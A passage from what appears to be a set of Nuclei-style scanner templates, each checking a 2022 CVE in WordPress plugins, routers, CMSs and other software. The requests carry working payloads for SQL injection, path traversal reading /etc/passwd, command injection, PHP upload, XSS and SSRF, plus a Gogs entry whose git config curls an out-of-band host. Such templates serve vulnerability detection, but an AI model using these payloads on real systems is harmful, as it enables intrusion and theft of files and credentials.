Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2535","info":{"name":"SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"searchwp-live-search-result\")"],"condition":"and"}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-39048","info":{"name":"ServiceNow - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /navpage.do HTTP/1.1\nHost: {{Hostname}}\n","POST /login.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do\n","GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["unwrapped_url = \"javascript:alert(document.domain)//assessment_take2.do\"","assessment_list.do"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"sysparm_ck\" id=\"sysparm_ck\" type=\"hidden\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-36553","info":{"name":"Hytec Inter HWL-2511-SS - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["cat%20/etc/passwd","type%20C://Windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, '<title>index</title>')","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200","contains(body_1, '<title>index</title>')"],"condition":"and"}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0533","info":{"name":"Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains_all(body_2, \"<img src onerror=alert(document.domain)>\", \"ditty\")"],"condition":"and"}]}]},{"id":"CVE-2022-22897","info":{"name":"PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /modules/appagebuilder/config.xml HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI\n","@timeout: 20s\nPOST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nX-Requested-With: XMLHttpRequest\n\nleoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"time-based","dsl":["duration_2>=6","status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["status_code_1 == 200 && compare_versions(version, \"<= 2.4.4\")","contains(body_3, \"content\") && contains(body_3, \"{{Hostname}}\")","!contains(body_4, \"content\") && !contains(body_4, \"{{Hostname}}\")","len(body_3) > 200 && len(body_4) <= 22"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","part":"body_1","internal":true,"group":1,"regex":["<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"]}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29013","info":{"name":"Razer Sila Gaming Router - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ubus/"],"headers":{"Origin":"{{RootURL}}","Referer":"{{ROotURL}}","X-Requested-With":"XMLHttpRequest"},"body":"{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1580","info":{"name":"Site Offline WP Plugin < 1.5.3 - Authorization Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["Site Offline Or Coming Soon Or Maintenance Mode"]}]},{"method":"GET","path":["{{BaseURL}}/?admin"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"wp-block\", \"author\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-4059","info":{"name":"Cryptocurrency Widgets Pack < 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- 